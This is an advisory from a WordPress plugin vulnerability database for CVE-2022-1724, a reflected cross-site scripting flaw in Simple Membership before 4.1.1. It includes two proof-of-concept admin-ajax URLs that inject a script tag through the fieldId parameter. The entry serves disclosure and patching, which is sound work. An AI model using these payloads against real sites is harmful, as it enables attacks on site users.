Simple Membership < 4.1.1 – Reflected Cross-Site Scripting | CVE 2022-1724 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_user_name&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Affects Plugins

simple-membership

Fixed in 4.1.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

96a0a667-9c4b-4ea6-b78a-0681e9a9bbae

Timeline

Publicly Published

2022-05-23 (about 3 years ago)

Added

2022-05-23 (about 3 years ago)

Last Updated

2023-02-18 (about 2 years ago)

Other

Published

Title

Published

2025-06-19

Title

Hostel < 1.1.5.9 - Admin+ Stored XSS

Published

2024-07-09

Title

Send email only on Reply to My Comment <= 1.0.6 - Stored XSS via CSRF

Published

2025-03-24

Title

My Default Post Content <= 0.7.3 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2019-09-28

Title

Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)

Published

2021-05-06

Title

PickPlugins Product Slider for WooCommerce < 1.13.22 - Reflected Cross-Site Scripting (XSS)